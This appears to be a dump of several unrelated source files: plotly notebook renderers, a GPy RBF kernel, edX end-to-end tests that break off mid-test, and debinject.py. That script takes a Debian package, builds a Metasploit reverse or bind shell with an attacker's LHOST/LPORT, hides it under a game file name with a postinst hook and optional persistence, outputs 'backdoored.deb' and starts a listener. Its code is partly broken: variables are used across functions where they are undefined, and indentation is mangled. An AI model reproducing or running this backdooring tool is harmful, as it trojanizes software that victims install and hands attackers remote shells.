        self, config=None, auto_play=False, post_script=None, animation_opts=None
    ):
        # Same fixed mode as the other connected notebook renderers.
        mode = dict(connected=True, full_html=False, requirejs=True, global_init=True)
        super(AzureRenderer, self).__init__(
            config=config,
            auto_play=auto_play,
            post_script=post_script,
            animation_opts=animation_opts,
            **mode
        )
class ColabRenderer(HtmlRenderer):
    """
    Renderer for Google Colab Notebooks (mime type 'text/html').

    Emits a complete standalone HTML document (full_html=True), loads
    plotly.js from a CDN (connected=True) and performs no require.js setup
    or global initialization. Enabled by default when running in Colab.
    """

    def __init__(
        self, config=None, auto_play=False, post_script=None, animation_opts=None
    ):
        colab_mode = dict(
            connected=True,
            full_html=True,
            requirejs=False,
            global_init=False,
        )
        super(ColabRenderer, self).__init__(
            config=config,
            auto_play=auto_play,
            post_script=post_script,
            animation_opts=animation_opts,
            **colab_mode
        )
class IFrameRenderer(MimetypeRenderer):
    """
    Renderer to display interactive figures using an IFrame. HTML
    representations of Figures are saved to an `iframe_figures/` directory and
    iframe HTML elements that reference these files are inserted into the
    notebook.

    With this approach, neither plotly.js nor the figure data are embedded in
    the notebook, so this is a good choice for notebooks that contain so many
    large figures that basic operations (like saving and opening) become
    very slow.

    Notebooks using this renderer will display properly when exported to HTML
    as long as the `iframe_figures/` directory is placed in the same directory
    as the exported html file.

    Note that the HTML files in `iframe_figures/` are numbered according to
    the IPython cell execution count and so they will start being overwritten
    each time the kernel is restarted. This directory may be deleted whenever
    the kernel is restarted and it will be automatically recreated.

    mime type: 'text/html'
    """

    def __init__(
        self,
        config=None,
        auto_play=False,
        post_script=None,
        animation_opts=None,
        include_plotlyjs=True,
        html_directory="iframe_figures",
    ):
        self.config = config
        self.auto_play = auto_play
        self.post_script = post_script
        self.animation_opts = animation_opts
        # Passed through to write_html; True embeds plotly.js in each file.
        self.include_plotlyjs = include_plotlyjs
        # Directory the per-cell HTML files are written to.
        self.html_directory = html_directory

    def to_mimebundle(self, fig_dict):
        """
        Write ``fig_dict`` to an HTML file and return a mimebundle holding an
        iframe element that references that file.
        """
        from plotly.io import write_html

        # Make iframe size slightly larger than figure size to avoid
        # having iframe have its own scroll bar.
        iframe_buffer = 20
        layout = fig_dict.get("layout", {})

        if layout.get("width", False):
            iframe_width = str(layout["width"] + iframe_buffer) + "px"
        else:
            iframe_width = "100%"

        if layout.get("height", False):
            # Bare integer is valid for the HTML height attribute (pixels).
            iframe_height = layout["height"] + iframe_buffer
        else:
            iframe_height = str(525 + iframe_buffer) + "px"

        # Build filename using ipython cell number
        filename = self.build_filename()

        # Create the output directory if needed. Kept Python-2 compatible
        # (no exist_ok); the unused `as error` binding was removed.
        try:
            os.makedirs(self.html_directory)
        except OSError:
            if not isdir(self.html_directory):
                raise

        write_html(
            fig_dict,
            filename,
            config=self.config,
            auto_play=self.auto_play,
            include_plotlyjs=self.include_plotlyjs,
            include_mathjax="cdn",
            auto_open=False,
            post_script=self.post_script,
            animation_opts=self.animation_opts,
            default_width="100%",
            default_height=525,
            validate=False,
        )

        # Build IFrame
        iframe_html = """\
<iframe
    scrolling="no"
    width="{width}"
    height="{height}"
    src="{src}"
    frameborder="0"
    allowfullscreen
></iframe>
""".format(
            width=iframe_width, height=iframe_height, src=self.build_url(filename)
        )

        return {"text/html": iframe_html}

    def build_filename(self):
        """Return a per-cell output path numbered by the IPython execution count."""
        ip = IPython.get_ipython() if IPython else None
        # Next execution count when IPython is available, 0 otherwise.
        cell_number = list(ip.history_manager.get_tail(1))[0][1] + 1 if ip else 0
        filename = "{dirname}/figure_{cell_number}.html".format(
            dirname=self.html_directory, cell_number=cell_number
        )
        return filename

    def build_url(self, filename):
        """Return the URL the iframe should reference (the file path itself)."""
        return filename
class CoCalcRenderer(IFrameRenderer):
    """
    IFrame renderer for CoCalc: numbers output files with a class-level
    counter (CoCalc has no usable IPython cell count) and appends a
    fullscreen/kiosk query string to the iframe URL.
    """

    # Monotonically increasing counter shared by all instances.
    _render_count = 0

    def build_filename(self):
        """Return the next counter-numbered output path and bump the counter."""
        filename = "{dirname}/figure_{render_count}.html".format(
            dirname=self.html_directory, render_count=CoCalcRenderer._render_count
        )

        CoCalcRenderer._render_count += 1
        return filename

    def build_url(self, filename):
        # Bug fix: the format string lacked the {filename} placeholder, so
        # every iframe pointed at the literal text "?fullscreen=kiosk"-suffixed
        # junk instead of the generated file.
        return "{filename}?fullscreen=kiosk".format(filename=filename)
class ExternalRenderer(BaseRenderer):
    """
    Base class for external renderers. ExternalRenderer subclasses
    do not display figures inline in a notebook environment, but render
    figures by some external means (e.g. a separate browser tab).

    Unlike MimetypeRenderer subclasses, ExternalRenderer subclasses are not
    invoked when a figure is asked to display itself in the notebook.
    Instead, they are invoked when the plotly.io.show function is called
    on a figure.
    """

    def render(self, fig):
        # Subclasses must implement the side-effecting display of `fig`.
        raise NotImplementedError()
def open_html_in_browser(html, using=None, new=0, autoraise=True):
    """
    Display html in a web browser without creating a temp file.

    Instantiates a trivial http server and uses the webbrowser module to
    open a URL to retrieve html from that server.

    Parameters
    ----------
    html: str
        HTML string to display
    using, new, autoraise:
        See docstrings in webbrowser.get and webbrowser.open

    Raises
    ------
    ValueError
        If `using` is given but no matching browser can be located.
    """
    if isinstance(html, six.string_types):
        html = html.encode("utf8")

    # Resolve the browser controller: system default when `using` is None,
    # otherwise the first key in `using` that webbrowser recognizes.
    browser = None

    if using is None:
        browser = webbrowser.get(None)
    else:
        if not isinstance(using, tuple):
            using = (using,)
        for browser_key in using:
            try:
                browser = webbrowser.get(browser_key)
                if browser is not None:
                    break
            except webbrowser.Error:
                pass

        if browser is None:
            raise ValueError("Can't locate a browser with key in " + str(using))

    class OneShotRequestHandler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.send_response(200)
            self.send_header("Content-type", "text/html")
            self.end_headers()

            # Stream the closed-over html payload in 1 MiB chunks.
            bufferSize = 1024 * 1024
            for i in range(0, len(html), bufferSize):
                self.wfile.write(html[i : i + bufferSize])

        def log_message(self, format, *args):
            # Silence stderr logging
            pass

    server = HTTPServer(("127.0.0.1", 0), OneShotRequestHandler)
    try:
        browser.open(
            "http://127.0.0.1:%s" % server.server_port, new=new, autoraise=autoraise
        )
        # Serve exactly one request (the browser's fetch), then return.
        server.handle_request()
    finally:
        # Bug fix: the listening socket was never closed, leaking a file
        # descriptor on every call.
        server.server_close()
class BrowserRenderer(ExternalRenderer):
    """
    Renderer that shows interactive figures in an external web browser.

    A new browser window or tab is opened when plotly.io.show is called on
    a figure. Because there are no ipython/jupyter dependencies, this is a
    good choice for environments without inline figure display.

    mime type: 'text/html'
    """

    def __init__(
        self,
        config=None,
        auto_play=False,
        using=None,
        new=0,
        autoraise=True,
        post_script=None,
        animation_opts=None,
    ):
        # Figure/HTML generation options.
        self.config = config
        self.auto_play = auto_play
        self.post_script = post_script
        self.animation_opts = animation_opts
        # webbrowser.open() options.
        self.using = using
        self.new = new
        self.autoraise = autoraise

    def render(self, fig_dict):
        """Convert the figure to standalone HTML and open it in a browser."""
        from plotly.io import to_html

        html_options = dict(
            config=self.config,
            auto_play=self.auto_play,
            include_plotlyjs=True,
            include_mathjax="cdn",
            post_script=self.post_script,
            full_html=True,
            animation_opts=self.animation_opts,
            default_width="100%",
            default_height="100%",
            validate=False,
        )
        page = to_html(fig_dict, **html_options)
        open_html_in_browser(page, self.using, self.new, self.autoraise)
class DatabricksRenderer(ExternalRenderer):
    """
    Renderer for Databricks notebooks: converts the figure to standalone
    HTML and passes it to the notebook's built-in ``displayHTML`` function.

    mime type: 'text/html'
    """

    def __init__(
        self,
        config=None,
        auto_play=False,
        post_script=None,
        animation_opts=None,
        include_plotlyjs="cdn",
    ):
        self.config = config
        self.auto_play = auto_play
        self.post_script = post_script
        self.animation_opts = animation_opts
        self.include_plotlyjs = include_plotlyjs
        # Lazily resolved handle to Databricks' displayHTML builtin.
        self._displayHTML = None

    @property
    def displayHTML(self):
        """
        Locate the Databricks ``displayHTML`` builtin by walking up the call
        stack, caching it on first success.

        Raises EnvironmentError when it cannot be found (i.e. when not
        running inside a Databricks notebook).
        """
        import inspect

        if self._displayHTML is None:
            for frame in inspect.getouterframes(inspect.currentframe()):
                global_names = set(frame.frame.f_globals)
                # Check for displayHTML plus a few others to reduce chance of a false
                # hit.
                if all(v in global_names for v in ["displayHTML", "display", "spark"]):
                    self._displayHTML = frame.frame.f_globals["displayHTML"]
                    break

            if self._displayHTML is None:
                raise EnvironmentError(
                    """
Unable to detect the Databricks displayHTML function. The 'databricks' renderer is only
supported when called from within the Databricks notebook environment."""
                )

        return self._displayHTML

    def render(self, fig_dict):
        """Convert ``fig_dict`` to standalone HTML and hand it to displayHTML."""
        from plotly.io import to_html

        html = to_html(
            fig_dict,
            config=self.config,
            auto_play=self.auto_play,
            include_plotlyjs=self.include_plotlyjs,
            include_mathjax="cdn",
            post_script=self.post_script,
            full_html=True,
            animation_opts=self.animation_opts,
            default_width="100%",
            default_height="100%",
            validate=False,
        )

        # displayHTML is a Databricks notebook built-in function
        self.displayHTML(html)
class SphinxGalleryHtmlRenderer(HtmlRenderer):
    """
    HTML renderer for sphinx-gallery builds: partial HTML, no require.js,
    no global initialization, plotly.js from a CDN when connected.
    """

    def __init__(
        self,
        connected=True,
        config=None,
        auto_play=False,
        post_script=None,
        animation_opts=None,
    ):
        super(SphinxGalleryHtmlRenderer, self).__init__(
            connected=connected,
            config=config,
            auto_play=auto_play,
            post_script=post_script,
            animation_opts=animation_opts,
            # Fixed mode for sphinx-gallery pages.
            full_html=False,
            requirejs=False,
            global_init=False,
        )

    def to_mimebundle(self, fig_dict):
        """Build a 'text/html' mimebundle without the notebook post-scripts."""
        from plotly.io import to_html

        # Select how plotly.js and MathJax are sourced.
        if self.requirejs:
            plotlyjs_source, mathjax_source = "require", False
        elif self.connected:
            plotlyjs_source, mathjax_source = "cdn", "cdn"
        else:
            plotlyjs_source, mathjax_source = True, "cdn"

        return {
            "text/html": to_html(
                fig_dict,
                config=self.config,
                auto_play=self.auto_play,
                include_plotlyjs=plotlyjs_source,
                include_mathjax=mathjax_source,
                full_html=self.full_html,
                animation_opts=self.animation_opts,
                default_width="100%",
                default_height=525,
                validate=False,
            )
        }
class SphinxGalleryOrcaRenderer(ExternalRenderer):
    """
    Renderer for sphinx-gallery builds that writes the figure next to the
    calling example script as both an interactive HTML file and a PNG
    thumbnail (generated via orca).
    """

    def render(self, fig_dict):
        stack = inspect.stack()
        # Name of script from which plot function was called is retrieved
        try:
            filename = stack[3].filename  # let's hope this is robust...
        except AttributeError:
            # Python 2: inspect.stack() returns plain tuples, so .filename
            # raises AttributeError. (The original bare `except:` also masked
            # unrelated errors such as KeyboardInterrupt.)
            filename = stack[3][1]
        filename_root, _ = os.path.splitext(filename)
        filename_html = filename_root + ".html"
        filename_png = filename_root + ".png"
        figure = return_figure_from_figure_or_data(fig_dict, True)
        _ = write_html(fig_dict, file=filename_html, include_plotlyjs="cdn")
        try:
            write_image(figure, filename_png)
        except (ValueError, ImportError):
            raise ImportError(
                "orca and psutil are required to use the `sphinx-gallery-orca` renderer. "
                "See https://plotly.com/python/static-image-export/ for instructions on "
                "how to install orca. Alternatively, you can use the `sphinx-gallery` "
                "renderer (note that png thumbnails can only be generated with "
                "the `sphinx-gallery-orca` renderer)."
            )
| plotly/plotly.py | packages/python/plotly/plotly/io/_base_renderers.py | Python | mit | 26,732 | [
"ORCA"
] | 682bef549fe48afb90ee7754ada470e9669f2bd636c025405a7e912d506db2dd |
# Copyright (c) 2012, GPy authors (see AUTHORS.txt).
# Licensed under the BSD 3-clause license (see LICENSE.txt)
import numpy as np
from stationary import Stationary
from psi_comp import PSICOMP_RBF
from psi_comp.rbf_psi_gpucomp import PSICOMP_RBF_GPU
from ...util.config import *
class RBF(Stationary):
    r"""
    Radial Basis Function kernel, aka squared-exponential, exponentiated quadratic or Gaussian kernel:

    .. math::

       k(r) = \sigma^2 \exp \bigg(- \frac{1}{2} r^2 \bigg)
    """
    _support_GPU = True

    def __init__(self, input_dim, variance=1., lengthscale=None, ARD=False, active_dims=None, name='rbf', useGPU=False):
        super(RBF, self).__init__(input_dim, variance, lengthscale, ARD, active_dims, name, useGPU=useGPU)
        # Pick the psi-statistics backend exactly once. (The original code
        # unconditionally built a CPU instance first and then discarded it
        # on the GPU path.)
        if self.useGPU:
            self.psicomp = PSICOMP_RBF_GPU()
        else:
            self.psicomp = PSICOMP_RBF()

    def K_of_r(self, r):
        """Kernel value as a function of the scaled distance r."""
        return self.variance * np.exp(-0.5 * r**2)

    def dK_dr(self, r):
        """Derivative of K with respect to r."""
        return -r*self.K_of_r(r)

    def __getstate__(self):
        # Swap the GPU backend for a picklable CPU one when serializing.
        dc = super(RBF, self).__getstate__()
        if self.useGPU:
            dc['psicomp'] = PSICOMP_RBF()
        return dc

    def __setstate__(self, state):
        return super(RBF, self).__setstate__(state)

    def spectrum(self, omega):
        """
        Spectral density of the kernel for 1-D inputs:
        S(omega) = sigma^2 * sqrt(2*pi) * l * exp(-l**2 * omega**2 / 2)
        """
        assert self.input_dim == 1  # TODO: higher dim spectra?
        # Bug fix: the exponent previously used `lengthscale*2` where the
        # Fourier transform of the RBF kernel requires `lengthscale**2`.
        return self.variance*np.sqrt(2*np.pi)*self.lengthscale*np.exp(-self.lengthscale**2*omega**2/2)

    #---------------------------------------#
    #             PSI statistics            #
    #---------------------------------------#

    def psi0(self, Z, variational_posterior):
        # First psi statistic from the backend (see PSICOMP_RBF for the
        # exact definition).
        return self.psicomp.psicomputations(self.variance, self.lengthscale, Z, variational_posterior)[0]

    def psi1(self, Z, variational_posterior):
        # Second psi statistic from the backend.
        return self.psicomp.psicomputations(self.variance, self.lengthscale, Z, variational_posterior)[1]

    def psi2(self, Z, variational_posterior):
        # Third psi statistic from the backend.
        return self.psicomp.psicomputations(self.variance, self.lengthscale, Z, variational_posterior)[2]

    def update_gradients_expectations(self, dL_dpsi0, dL_dpsi1, dL_dpsi2, Z, variational_posterior):
        """Store gradients of the psi statistics w.r.t. variance and lengthscale."""
        dL_dvar, dL_dlengscale = self.psicomp.psiDerivativecomputations(dL_dpsi0, dL_dpsi1, dL_dpsi2, self.variance, self.lengthscale, Z, variational_posterior)[:2]
        self.variance.gradient = dL_dvar
        self.lengthscale.gradient = dL_dlengscale

    def gradients_Z_expectations(self, dL_dpsi0, dL_dpsi1, dL_dpsi2, Z, variational_posterior):
        """Return gradients of the psi statistics w.r.t. the inducing inputs Z."""
        return self.psicomp.psiDerivativecomputations(dL_dpsi0, dL_dpsi1, dL_dpsi2, self.variance, self.lengthscale, Z, variational_posterior)[2]

    def gradients_qX_expectations(self, dL_dpsi0, dL_dpsi1, dL_dpsi2, Z, variational_posterior):
        """Return gradients of the psi statistics w.r.t. the variational posterior."""
        return self.psicomp.psiDerivativecomputations(dL_dpsi0, dL_dpsi1, dL_dpsi2, self.variance, self.lengthscale, Z, variational_posterior)[3:]
| TianpeiLuke/GPy | GPy/kern/_src/rbf.py | Python | bsd-3-clause | 2,940 | [
"Gaussian"
] | ee63a4212c196dbd342395f6c146873c0c0e6caf6811b4e96ae8000bd5a5121f |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#-------------------------------
#
# BY: UNDEADSEC from BRAZIL :)
# Visit: https://www.youtube.com/c/UndeadSec
# Github: https://github.com/UndeadSec/EvilURL
# Telegram: https://t.me/UndeadSec
#
#-------------------------------
BLUE, RED, WHITE, YELLOW, GREEN, END = '\33[94m', '\033[91m', '\33[97m', '\33[93m', '\033[1;32m', '\033[0m'
#-------------------------------
from subprocess import call
#-------------------------------
def message():
    # Clear the terminal and print the colorized ASCII banner.
    # Positional format args: {0}=GREEN, {1}=END (reset), {2}=RED.
    call('clear', shell=True)
    print """
    --------------------{1}
    ┌┬┐┌─┐┌┐ ┬┌┐┌ ┬┌─┐┌─┐┌┬┐
     ││├┤ ├┴┐││││ │├┤ │ │ BY: {1}Undead{2}Sec{1} from BRazil {0}
    ─┴┘└─┘└─┘┴┘└┘└┘└─┘└─┘ ┴
    {0} --------------------{1}
    """.format(GREEN, END, RED, YELLOW, GREEN)
#-------------------------------
def main():
call('rm -Rf output', shell=True)
call("rm -Rf /tmp/evil", shell=True)
print '~ / Inject malicious codes into *.deb\'s\n '
print "{0}[-] Insert *.deb file path: {1}".format(YELLOW, END)
file_path = raw_input("\n{0}debinject{1} > ".format(GREEN, END))
print "\n{0}[-] Insert LHOST: {1}".format(YELLOW, END)
LHOST = raw_input("\n{0}debinject{1} > ".format(GREEN, END))
print "\n{0}[-] Insert LPORT: {1}".format(YELLOW, END)
LPORT = raw_input("\n{0}debinject{1} > ".format(GREEN, END))
call('mkdir /tmp/evil', shell=True)
call('cp ' + file_path + ' /tmp/evil/original.deb', shell=True)
call('dpkg -x /tmp/evil/original.deb /tmp/evil/work', shell=True)
call('mkdir /tmp/evil/work/DEBIAN', shell=True)
#-------------------------------
def setArch():
print '\nInsert the target arch x86 or x64: '
arch = raw_input("\n{0}debinject{1} > ".format(GREEN, END))
if arch == 'x64':
call('cp Utils/x64/control /tmp/evil/work/DEBIAN')
call('cp Utils/x64/postinst /tmp/evil/work/DEBIAN')
elif arch == 'x86':
call('cp Utils/x86/control /tmp/evil/work/DEBIAN')
call('cp Utils/x86/postinst /tmp/evil/work/DEBIAN')
else:
print "\nChoose [x64] or [x86]"
#-------------------------------
def setPayload():
print "\n - CHOOSE THE PAYLOAD - \n[1] metasploit/linux/<arch>/shell/reverse_tcp\n[2] metasploit/linux/<arch>/meterpreter/reverse_tcp\n[3] metasploit/linux/<arch>/meterpreter/bind_tcp\n[4] metasploit/linux/<arch>/shell/bind_tcp"
option = raw_input("\n{0}debinject{1} > ".format(GREEN, END))
if option == '1':
call('msfvenom -a ' + arch + ' --platform linux -p linux/' + arch + '/shell/reverse_tcp LHOST=' + LHOST + ' LPORT=' + LPORT + ' -f elf -o /tmp/evil/work/usr/games/freesweep_scores', shell=True)
elif option == '2':
call('msfvenom -a ' + arch + ' --platform linux -p linux/' + arch + '/meterpreter/reverse_tcp LHOST=' + LHOST + ' LPORT=' + LPORT + ' -f elf -o /tmp/evil/work/usr/games/freesweep_scores', shell=True)
elif option == '3':
call('msfvenom -a ' + arch + ' --platform linux -p linux/' + arch + '/meterpreter/bind_tcp LHOST=' + LHOST + ' LPORT=' + LPORT + ' -f elf -o /tmp/evil/work/usr/games/freesweep_scores', shell=True)
elif option == '4':
call('msfvenom -a ' + arch + ' --platform linux -p linux/' + arch + '/shell/bind_tcp LHOST=' + LHOST + ' LPORT=' + LPORT + ' -f elf -o /tmp/evil/work/usr/games/freesweep_scores', shell=True)
else:
print "\nInvalid"
call('exit', shell=True)
#-------------------------------
def setPersistence():
    # Optionally copy the persistence helper into the package's games dir.
    answer = raw_input('\nDo you want to enable persistence?(y/n) : ')
    if answer.lower() == 'y':
        call('cp Utils/Persistence/kernellog /tmp/evil/work/usr/games/', shell=True)
#-------------------------------
def makeEvil():
call('chmod 755 /tmp/evil/work/DEBIAN/postinst', shell=True)
call('cd /tmp/evil/work/DEBIAN && dpkg-deb --build /tmp/evil/work', shell=True)
call('rm -Rf output/ && mkdir output', shell=True)
call('mv /tmp/evil/work.deb output/backdoored.deb && chmod 755 output/backdoored.deb', shell=True)
print "\n The .deb backdoored saved to: /output/backdoored.deb\n"
listen = raw_input("Do you want to start listener? (y/n): ")
if option != '3' and option != '4':
if listen.upper() == "Y":
if option == '1':
call('service postgresql start', shell=True)
call('msfconsole -q -x "use exploit/multi/handler;set PAYLOAD linux/' + arch + '/shell/reverse_tcp; set LHOST ' + LHOST + '; set LPORT ' + LPORT + '; run; exit -y"', shell=True)
elif option == '2':
call('service postgresql start')
call('msfconsole -q -x "use exploit/multi/handler;set PAYLOAD linux/' + arch + '/meterpreter/reverse_tcp; set LHOST ' + LHOST + '; set LPORT ' + LPORT + '; run; exit -y"', shell=True)
else:
print "Bye :D"
else:
print "\nStart Metasploit listener and Happy Hacking"
#-------------------------------
if __name__ == '__main__':
    # Drive the full workflow: banner, input collection, architecture
    # selection, payload generation, optional persistence, package rebuild.
    message()
    main()
    setArch()
    setPayload()
    setPersistence()
    makeEvil()
| UndeadSec/Debinject | debinject.py | Python | bsd-3-clause | 5,133 | [
"VisIt"
] | 34e4e89f1c7c07726820d023743e44e6dd3192ad841efee3c2168b7413beb04b |
# -*- coding: utf-8 -*-
"""
End-to-end tests for the LMS.
"""
from flaky import flaky
from textwrap import dedent
from unittest import skip
from nose.plugins.attrib import attr
from bok_choy.promise import EmptyPromise
from bok_choy.web_app_test import WebAppTest
from ..helpers import (
UniqueCourseTest,
EventsTestMixin,
load_data_str,
generate_course_key,
select_option_by_value,
element_has_text
)
from ...pages.lms.auto_auth import AutoAuthPage
from ...pages.lms.create_mode import ModeCreationPage
from ...pages.common.logout import LogoutPage
from ...pages.lms.course_info import CourseInfoPage
from ...pages.lms.tab_nav import TabNavPage
from ...pages.lms.course_nav import CourseNavPage
from ...pages.lms.progress import ProgressPage
from ...pages.lms.dashboard import DashboardPage
from ...pages.lms.problem import ProblemPage
from ...pages.lms.video.video import VideoPage
from ...pages.lms.courseware import CoursewarePage
from ...pages.studio.settings import SettingsPage
from ...pages.lms.login_and_register import CombinedLoginAndRegisterPage
from ...pages.lms.track_selection import TrackSelectionPage
from ...pages.lms.pay_and_verify import PaymentAndVerificationFlow, FakePaymentPage
from ...pages.lms.course_wiki import CourseWikiPage, CourseWikiEditPage
from ...fixtures.course import CourseFixture, XBlockFixtureDesc, CourseUpdateDesc
@attr('shard_1')
class LoginFromCombinedPageTest(UniqueCourseTest):
    """Test that we can log in using the combined login/registration page.

    Also test that we can request a password reset from the combined
    login/registration page.
    """

    def setUp(self):
        """Initialize the page objects and create a test course. """
        super(LoginFromCombinedPageTest, self).setUp()
        self.login_page = CombinedLoginAndRegisterPage(
            self.browser,
            start_page="login",
            course_id=self.course_id
        )
        self.dashboard_page = DashboardPage(self.browser)

        # Create a course to enroll in
        CourseFixture(
            self.course_info['org'], self.course_info['number'],
            self.course_info['run'], self.course_info['display_name']
        ).install()

    def test_login_success(self):
        """Logging in with valid credentials lands on the dashboard, auto-enrolled."""
        # Create a user account
        email, password = self._create_unique_user()

        # Navigate to the login page and try to log in
        self.login_page.visit().login(email=email, password=password)

        # Expect that we reach the dashboard and we're auto-enrolled in the course
        course_names = self.dashboard_page.wait_for_page().available_courses
        self.assertIn(self.course_info["display_name"], course_names)

    def test_login_failure(self):
        """An unknown account produces an inline error message."""
        # Navigate to the login page
        self.login_page.visit()

        # User account does not exist
        self.login_page.login(email="nobody@nowhere.com", password="password")

        # Verify that an error is displayed
        self.assertIn("Email or password is incorrect.", self.login_page.wait_for_errors())

    def test_toggle_to_register_form(self):
        """The toggle link switches the combined page over to the register form."""
        self.login_page.visit().toggle_form()
        self.assertEqual(self.login_page.current_form, "register")

    @flaky  # TODO fix this, see ECOM-1165
    def test_password_reset_success(self):
        """Requesting a reset for an existing account shows a success message."""
        # Create a user account
        email, password = self._create_unique_user()  # pylint: disable=unused-variable

        # Navigate to the password reset form and try to submit it
        self.login_page.visit().password_reset(email=email)

        # Expect that we're shown a success message
        self.assertIn("PASSWORD RESET EMAIL SENT", self.login_page.wait_for_success())

    def test_password_reset_failure(self):
        """Requesting a reset for an unknown account shows an error message."""
        # Navigate to the password reset form
        self.login_page.visit()

        # User account does not exist
        self.login_page.password_reset(email="nobody@nowhere.com")

        # Expect that we're shown a failure message
        self.assertIn(
            "No user with the provided email address exists.",
            self.login_page.wait_for_errors()
        )

    def _create_unique_user(self):
        """
        Create a new user with a unique name and email.

        Returns (email, password); the new user is logged out before returning.
        """
        username = "test_{uuid}".format(uuid=self.unique_id[0:6])
        email = "{user}@example.com".format(user=username)
        password = "password"

        # Create the user (automatically logs us in)
        AutoAuthPage(
            self.browser,
            username=username,
            email=email,
            password=password
        ).visit()

        # Log out
        LogoutPage(self.browser).visit()

        return (email, password)
@attr('shard_1')
class RegisterFromCombinedPageTest(UniqueCourseTest):
    """Test that we can register a new user from the combined login/registration page. """

    def setUp(self):
        """Initialize the page objects and create a test course. """
        super(RegisterFromCombinedPageTest, self).setUp()
        self.register_page = CombinedLoginAndRegisterPage(
            self.browser,
            start_page="register",
            course_id=self.course_id
        )
        self.dashboard_page = DashboardPage(self.browser)

        # Create a course to enroll in
        CourseFixture(
            self.course_info['org'], self.course_info['number'],
            self.course_info['run'], self.course_info['display_name']
        ).install()

    def test_register_success(self):
        """A fully-filled registration form creates the account and auto-enrolls."""
        # Navigate to the registration page
        self.register_page.visit()

        # Fill in the form and submit it
        username = "test_{uuid}".format(uuid=self.unique_id[0:6])
        email = "{user}@example.com".format(user=username)
        self.register_page.register(
            email=email,
            password="password",
            username=username,
            full_name="Test User",
            country="US",
            terms_of_service=True
        )

        # Expect that we reach the dashboard and we're auto-enrolled in the course
        course_names = self.dashboard_page.wait_for_page().available_courses
        self.assertIn(self.course_info["display_name"], course_names)
        self.assertEqual("want to change your account settings?", self.dashboard_page.sidebar_menu_title.lower())
        self.assertEqual(
            "click the arrow next to your username above.",
            self.dashboard_page.sidebar_menu_description.lower()
        )

    def test_register_failure(self):
        """Missing required fields produce one validation error per field."""
        # Navigate to the registration page
        self.register_page.visit()

        # Enter a blank for the username field, which is required
        # Don't agree to the terms of service / honor code.
        # Don't specify a country code, which is required.
        username = "test_{uuid}".format(uuid=self.unique_id[0:6])
        email = "{user}@example.com".format(user=username)
        self.register_page.register(
            email=email,
            password="password",
            username="",
            full_name="Test User",
            terms_of_service=False
        )

        # Verify that the expected errors are displayed.
        errors = self.register_page.wait_for_errors()
        self.assertIn(u'Please enter your Public username.', errors)
        self.assertIn(u'You must agree to the edX Terms of Service and Honor Code.', errors)
        self.assertIn(u'Please select your Country.', errors)

    def test_toggle_to_login_form(self):
        """The toggle link switches the combined page over to the login form."""
        self.register_page.visit().toggle_form()
        self.assertEqual(self.register_page.current_form, "login")
@attr('shard_1')
class PayAndVerifyTest(EventsTestMixin, UniqueCourseTest):
    """Test that we can proceed through the payment and verification flow."""

    def setUp(self):
        """Initialize the test.

        Create the necessary page objects, create a test course and configure its modes,
        create a user and log them in.
        """
        super(PayAndVerifyTest, self).setUp()

        self.track_selection_page = TrackSelectionPage(self.browser, self.course_id)
        self.payment_and_verification_flow = PaymentAndVerificationFlow(self.browser, self.course_id)
        self.immediate_verification_page = PaymentAndVerificationFlow(self.browser, self.course_id, entry_point='verify-now')
        self.upgrade_page = PaymentAndVerificationFlow(self.browser, self.course_id, entry_point='upgrade')
        self.fake_payment_page = FakePaymentPage(self.browser, self.course_id)
        self.dashboard_page = DashboardPage(self.browser)

        # Create a course
        CourseFixture(
            self.course_info['org'],
            self.course_info['number'],
            self.course_info['run'],
            self.course_info['display_name']
        ).install()

        # Add an honor mode to the course
        ModeCreationPage(self.browser, self.course_id).visit()

        # Add a verified mode to the course
        ModeCreationPage(self.browser, self.course_id, mode_slug=u'verified', mode_display_name=u'Verified Certificate', min_price=10, suggested_prices='10,20').visit()

    @skip("Flaky 02/02/2015")
    def test_immediate_verification_enrollment(self):
        """Enroll as verified, pay, complete webcam verification immediately."""
        # Create a user and log them in
        student_id = AutoAuthPage(self.browser).visit().get_user_id()

        # Navigate to the track selection page
        self.track_selection_page.visit()

        # Enter the payment and verification flow by choosing to enroll as verified
        self.track_selection_page.enroll('verified')

        # Proceed to the fake payment page
        self.payment_and_verification_flow.proceed_to_payment()

        # Submit payment
        self.fake_payment_page.submit_payment()

        # Expect enrollment activated event
        self.assert_event_emitted_num_times(
            "edx.course.enrollment.activated",
            self.start_time,
            student_id,
            1
        )

        # Expect that one mode_changed enrollment event fired as part of the upgrade
        self.assert_event_emitted_num_times(
            "edx.course.enrollment.mode_changed",
            self.start_time,
            student_id,
            1
        )

        # Proceed to verification
        self.payment_and_verification_flow.immediate_verification()

        # Take face photo and proceed to the ID photo step
        self.payment_and_verification_flow.webcam_capture()
        self.payment_and_verification_flow.next_verification_step(self.immediate_verification_page)

        # Take ID photo and proceed to the review photos step
        self.payment_and_verification_flow.webcam_capture()
        self.payment_and_verification_flow.next_verification_step(self.immediate_verification_page)

        # Submit photos and proceed to the enrollment confirmation step
        self.payment_and_verification_flow.next_verification_step(self.immediate_verification_page)

        # Navigate to the dashboard
        self.dashboard_page.visit()

        # Expect that we're enrolled as verified in the course
        enrollment_mode = self.dashboard_page.get_enrollment_mode(self.course_info["display_name"])
        self.assertEqual(enrollment_mode, 'verified')

    def test_deferred_verification_enrollment(self):
        """Enroll as verified and pay, but defer the webcam verification step."""
        # Create a user and log them in
        student_id = AutoAuthPage(self.browser).visit().get_user_id()

        # Navigate to the track selection page
        self.track_selection_page.visit()

        # Enter the payment and verification flow by choosing to enroll as verified
        self.track_selection_page.enroll('verified')

        # Proceed to the fake payment page
        self.payment_and_verification_flow.proceed_to_payment()

        # Submit payment
        self.fake_payment_page.submit_payment()

        # Expect enrollment activated event
        self.assert_event_emitted_num_times(
            "edx.course.enrollment.activated",
            self.start_time,
            student_id,
            1
        )

        # Navigate to the dashboard
        self.dashboard_page.visit()

        # Expect that we're enrolled as verified in the course
        enrollment_mode = self.dashboard_page.get_enrollment_mode(self.course_info["display_name"])
        self.assertEqual(enrollment_mode, 'verified')

    def test_enrollment_upgrade(self):
        """Upgrade an existing honor enrollment to verified via the dashboard upsell."""
        # Create a user, log them in, and enroll them in the honor mode
        student_id = AutoAuthPage(self.browser, course_id=self.course_id).visit().get_user_id()

        # Navigate to the dashboard
        self.dashboard_page.visit()

        # Expect that we're enrolled as honor in the course
        enrollment_mode = self.dashboard_page.get_enrollment_mode(self.course_info["display_name"])
        self.assertEqual(enrollment_mode, 'honor')

        # Click the upsell button on the dashboard
